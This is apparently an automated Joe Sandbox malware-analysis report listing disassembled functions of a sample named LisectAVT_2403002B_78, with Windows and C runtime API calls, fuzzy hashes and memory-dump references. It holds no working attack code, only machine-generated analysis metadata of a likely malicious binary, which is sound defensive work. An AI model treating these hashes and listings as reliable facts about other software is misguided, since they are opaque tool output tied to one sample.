                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: _strrchr
                                                                      • String ID:
                                                                      • API String ID: 3213747228-0
                                                                      • Opcode ID: 88fa05fee6af742072e9b0999c7c4b8006f620844c5ab2e84b20edb38d002f48
                                                                      • Instruction ID: 4170287a22a0615428eb1182c26985a457ab7fea274f0b555a374668f3cfc61c
                                                                      • Opcode Fuzzy Hash: 88fa05fee6af742072e9b0999c7c4b8006f620844c5ab2e84b20edb38d002f48
                                                                      • Instruction Fuzzy Hash: B0B15872A00255AFDB11CF6CCC81BEE7BBDEF55354F294165E804AB283DA78D941C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: char_traits
                                                                      • String ID:
                                                                      • API String ID: 1158913984-3916222277
                                                                      • Opcode ID: 9992890c9afaafaabc23ccd5b0056a2394fbebafae0edfb44ae6f50bdc84cabe
                                                                      • Instruction ID: 931892b01f507ddac07ab8e7b936eba29daffb1428e1cd0026b83c5aab926e68
                                                                      • Opcode Fuzzy Hash: 9992890c9afaafaabc23ccd5b0056a2394fbebafae0edfb44ae6f50bdc84cabe
                                                                      • Instruction Fuzzy Hash: FB5153B5D10109AFCB04DF94C5519EEBBB5AF8B300F48816AF511AB282E7759E44CFA1
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(00000000,?,00AB7C95,00AADDC1,CE3BFFFF,00000000,00AAEB35,00000000,?,00AB7EBF,00000022,FlsSetValue,00ACBE90,00ACBE98,00AAEB35), ref: 00AB7C47
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3664257935-537541572
                                                                      • Opcode ID: c2a44f41ab816696019aaf9849d7ce2fce5a8b23802004de03407e17ed664eee
                                                                      • Instruction ID: 6da6f6a057dd8597fea9372b84eba5f2107bf79adbb4b81ab97d5513f011d30f
                                                                      • Opcode Fuzzy Hash: c2a44f41ab816696019aaf9849d7ce2fce5a8b23802004de03407e17ed664eee
                                                                      • Instruction Fuzzy Hash: 95212B71A05610ABCB21DB65EC41FDF3B6CBB82370F210555E912A7292DFB0EE01DAE0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: Fgetc
                                                                      • String ID:
                                                                      • API String ID: 1720979605-0
                                                                      • Opcode ID: c7b179d09ec7bc08164cf45005fcba81018e4a7b97e8b86457fd22583cd53bc2
                                                                      • Instruction ID: b67658a4f887c519ebce62bc3d9b9b372aa3c5e460c7e4fcb290d16f4935b379
                                                                      • Opcode Fuzzy Hash: c7b179d09ec7bc08164cf45005fcba81018e4a7b97e8b86457fd22583cd53bc2
                                                                      • Instruction Fuzzy Hash: 0A613EB1C001099FCB04EBE4CA52AEEB7B4AF5A311F244229F412772D5EB755E08CFA5
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00AACA01,00AAB151,00AAA68A), ref: 00AACA18
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AACA26
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AACA3F
                                                                      • SetLastError.KERNEL32(00000000,00AACA01,00AAB151,00AAA68A), ref: 00AACA91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: c04df855c8cb6f74aa0a1cf3046daacf3a095b6353fb0e0edb648906ab124c0a
                                                                      • Instruction ID: 394835bbaef04dddaf7c87a88ef845047501882d12ca81d77639e2d1f3b83750
                                                                      • Opcode Fuzzy Hash: c04df855c8cb6f74aa0a1cf3046daacf3a095b6353fb0e0edb648906ab124c0a
                                                                      • Instruction Fuzzy Hash: 2101B1322097155EF628ABF4AD85ABB3759EB033B4760022AF126935E1FF554C029244
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00AADB63,?,?,00AD85C4,00000000,?,00AADC8E,00000004,InitializeCriticalSectionEx,00AC9C0C,InitializeCriticalSectionEx,00000000), ref: 00AADB32
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID: api-ms-
                                                                      • API String ID: 3664257935-2084034818
                                                                      • Opcode ID: 5a61a11d41b3df852e6456c52940924cc0541fd49c4cd809397e16b6e6b397b0
                                                                      • Instruction ID: f4c795a0f6a4b6b82e68a007397c8d1ad36f629ba09c79cb4b016b9336aa11a3
                                                                      • Opcode Fuzzy Hash: 5a61a11d41b3df852e6456c52940924cc0541fd49c4cd809397e16b6e6b397b0
                                                                      • Instruction Fuzzy Hash: 9311E936B41620ABDF22CBA89C44F9E33A4AF02770F270111F952EB6C0DB70ED0186E5
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,10830A53,00AAEB35,?,00000000,00AC76D3,000000FF,?,00AB3692,CE3BFFFF,?,00AB3666,?), ref: 00AB372D
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AB373F
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00AC76D3,000000FF,?,00AB3692,CE3BFFFF,?,00AB3666,?), ref: 00AB3761
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 4031385b99b5a27cda79dec6b035cd913934c0517ab9f765c49a1a88779dc5a9
                                                                      • Instruction ID: 96a95656aff4dc4823c24cc48550e7951e1800c909b879e7acf9e0505f08bebc
                                                                      • Opcode Fuzzy Hash: 4031385b99b5a27cda79dec6b035cd913934c0517ab9f765c49a1a88779dc5a9
                                                                      • Instruction Fuzzy Hash: E901A772954655FFDB01CB95DC09FAEB7B8FB04711F064629E811A22D0DF749904CB50
                                                                      APIs
                                                                      • __alloca_probe_16.LIBCMT ref: 00ABB3E1
                                                                      • __alloca_probe_16.LIBCMT ref: 00ABB4AA
                                                                      • __freea.LIBCMT ref: 00ABB511
                                                                        • Part of subcall function 00AB830E: HeapAlloc.KERNEL32(00000000,00ABE796,00000000,?,00ABE796,00000220,?,?,00000000), ref: 00AB8340
                                                                      • __freea.LIBCMT ref: 00ABB524
                                                                      • __freea.LIBCMT ref: 00ABB531
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 1096550386-0
                                                                      • Opcode ID: d00afab5868a4c304b66be5b198f701f4deaa1496e703c7e1cccd3ff46da2297
                                                                      • Instruction ID: 22d671562d5d2c5c522bb5243f01747c661ae5658543ba32269915b0232288e5
                                                                      • Opcode Fuzzy Hash: d00afab5868a4c304b66be5b198f701f4deaa1496e703c7e1cccd3ff46da2297
                                                                      • Instruction Fuzzy Hash: 3551CF72621206AFEB315FA4DD82EFB7AADEF44710B150228FD0696252EBB1CC50C671
                                                                      APIs
                                                                      • std::ios_base::good.LIBCPMTD ref: 00AA6D92
                                                                      • std::ios_base::getloc.LIBCPMTD ref: 00AA6E14
                                                                      • char_traits.LIBCPMTD ref: 00AA6EA8
                                                                      • std::ios_base::good.LIBCPMTD ref: 00AA6F3B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: std::ios_base::good$char_traitsstd::ios_base::getloc
                                                                      • String ID:
                                                                      • API String ID: 1920461149-0
                                                                      • Opcode ID: a1a83a1192562e1d6dc81d0da7bc82139ecb56097495347422dd223e6775050d
                                                                      • Instruction ID: 8acc3b8e85508720bcf5dc2ecbd53fb27f1dcb1290b98e39926586d1d7ddde13
                                                                      • Opcode Fuzzy Hash: a1a83a1192562e1d6dc81d0da7bc82139ecb56097495347422dd223e6775050d
                                                                      • Instruction Fuzzy Hash: E85128B4E04209DFCF04DFA4C992ABEBBB1AF4A314F188159E6126B3D1D735A941DF90
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: char_traits
                                                                      • String ID:
                                                                      • API String ID: 1158913984-0
                                                                      • Opcode ID: 6d38b8927014bae4a1bfc6197b3b45686e08351c4f3f0e563744a365e24d6631
                                                                      • Instruction ID: c47e142afeca70a47865cd411c80be7e128990298d51ae25953cfa320513dbd1
                                                                      • Opcode Fuzzy Hash: 6d38b8927014bae4a1bfc6197b3b45686e08351c4f3f0e563744a365e24d6631
                                                                      • Instruction Fuzzy Hash: DD31B5B5D00108ABCF04EFA0D951AEE7B756F8A301F48416AF4129B2C3EB719A45CBA1
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00AA7870
                                                                      • int.LIBCPMTD ref: 00AA7889
                                                                        • Part of subcall function 00AA1E00: std::_Lockit::_Lockit.LIBCPMT ref: 00AA1E16
                                                                        • Part of subcall function 00AA1E00: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA1E40
                                                                      • Concurrency::cancel_current_task.LIBCPMTD ref: 00AA78C9
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA7931
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                      • String ID:
                                                                      • API String ID: 3053331623-0
                                                                      • Opcode ID: 1670c63cbdd78b69105d377aacc99c4113867ad8096f7304345a910d5afc0b87
                                                                      • Instruction ID: 8f36e4fb2f377977ea66516a132db7830055b9fae7f02468be2416fb9a2422d8
                                                                      • Opcode Fuzzy Hash: 1670c63cbdd78b69105d377aacc99c4113867ad8096f7304345a910d5afc0b87
                                                                      • Instruction Fuzzy Hash: 123114B4D04209DBCB04EF98C991BEFBBB4BF49310F20461AE416673D1DB346A41CBA1
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00AA7D90
                                                                      • int.LIBCPMTD ref: 00AA7DA9
                                                                        • Part of subcall function 00AA1E00: std::_Lockit::_Lockit.LIBCPMT ref: 00AA1E16
                                                                        • Part of subcall function 00AA1E00: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA1E40
                                                                      • Concurrency::cancel_current_task.LIBCPMTD ref: 00AA7DE9
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA7E51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                      • String ID:
                                                                      • API String ID: 3053331623-0
                                                                      • Opcode ID: 3da51098eb2c4b762fef2a8271aaea663e5dddebe5e8044cdb81f649b3e3fa66
                                                                      • Instruction ID: 91b39aeb545d324d508669994cebdc1e9af9302033186819899972ca7ff60a3d
                                                                      • Opcode Fuzzy Hash: 3da51098eb2c4b762fef2a8271aaea663e5dddebe5e8044cdb81f649b3e3fa66
                                                                      • Instruction Fuzzy Hash: 3C3126B4D04209DFCB04EF98C991BEEBBB1BF49310F204669E516673D1DB396A00CBA1
                                                                      APIs
                                                                      • GetConsoleOutputCP.KERNEL32(10830A53,00000000,00000000,?), ref: 00AB692E
                                                                        • Part of subcall function 00ABD8F1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ABB507,?,00000000,-00000008), ref: 00ABD952
                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AB6B80
                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00AB6BC6
                                                                      • GetLastError.KERNEL32 ref: 00AB6C69
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                      • String ID:
                                                                      • API String ID: 2112829910-0
                                                                      • Opcode ID: 050a04c46a56147911f5c1a755a4dae890fb5cbca8e775cd0e7d1e34af117b92
                                                                      • Instruction ID: f074c3e6b8a875e7bc152a40ab4a36e64b2e4997b03083ecb11a4c7331440875
                                                                      • Opcode Fuzzy Hash: 050a04c46a56147911f5c1a755a4dae890fb5cbca8e775cd0e7d1e34af117b92
                                                                      • Instruction Fuzzy Hash: 11D17EB5D002489FCF15CFE8C990AEDBBB9FF09310F28452AE956EB352D634A941CB50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustPointer
                                                                      • String ID:
                                                                      • API String ID: 1740715915-0
                                                                      • Opcode ID: de37507afd405e8c8b7ee4adb54de93803943cb0cf25610bfa4e2bf65e6e6115
                                                                      • Instruction ID: 73b902ea64b90009d9c141166a6dff507cddcb0a165920bdc9a99d01622bd699
                                                                      • Opcode Fuzzy Hash: de37507afd405e8c8b7ee4adb54de93803943cb0cf25610bfa4e2bf65e6e6115
                                                                      • Instruction Fuzzy Hash: 2251E271A0060AAFFB298F54D941B7AB7B4EF06331F14452EE81A872D1D736EC81D7A0
                                                                      APIs
                                                                        • Part of subcall function 00ABD8F1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ABB507,?,00000000,-00000008), ref: 00ABD952
                                                                      • GetLastError.KERNEL32 ref: 00ABDD12
                                                                      • __dosmaperr.LIBCMT ref: 00ABDD19
                                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 00ABDD53
                                                                      • __dosmaperr.LIBCMT ref: 00ABDD5A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1913693674-0
                                                                      • Opcode ID: 76563600319e654f0868a35b2b5dc11013e5c8b02f200d57ea0c0c5dbb0e5134
                                                                      • Instruction ID: da4e9d56c4670a6ef89a1db456202d2bed3f8c69bceda627356a0b694525066d
                                                                      • Opcode Fuzzy Hash: 76563600319e654f0868a35b2b5dc11013e5c8b02f200d57ea0c0c5dbb0e5134
                                                                      • Instruction Fuzzy Hash: 6C21BE71600605AFDB20AFB58D81AFBB7ADFF053647548829F86997253EB34EC00CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ba660d55a8f6c00983e06897a800415c8e5c4b9170f03f91793a5745578fbffd
                                                                      • Instruction ID: b77c6915eef6d04ffa9251c6381f1d6774fc44a732026e91bda23e171699dffc
                                                                      • Opcode Fuzzy Hash: ba660d55a8f6c00983e06897a800415c8e5c4b9170f03f91793a5745578fbffd
                                                                      • Instruction Fuzzy Hash: 84219D31600205AFDB20AFB58D80EEB77ADFF48365710852AF81997193EB34EC40DBA1
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00ABEC3E
                                                                        • Part of subcall function 00ABD8F1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ABB507,?,00000000,-00000008), ref: 00ABD952
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ABEC76
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ABEC96
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                      • String ID:
                                                                      • API String ID: 158306478-0
                                                                      • Opcode ID: 4d4068527d6bf10c5402e0e53e670887cff78e5c4efcc9a7b48bf9edd8fbfc73
                                                                      • Instruction ID: b66ade1c48ece5508cab2122f8eaa1c3def2446cd4bff019d2f61340f9d0f1c1
                                                                      • Opcode Fuzzy Hash: 4d4068527d6bf10c5402e0e53e670887cff78e5c4efcc9a7b48bf9edd8fbfc73
                                                                      • Instruction Fuzzy Hash: AF11D2B25056297FA711A7B65E8ACFF6DACEEC67A4B110424F802D1103FE78DD1192F1
                                                                      APIs
                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,00AB0FCF,00000000,00000000,?,00AC1F9B,00000000,00000001,?,?,?,00AB6CBD,?,00000000,00000000), ref: 00AC5BDA
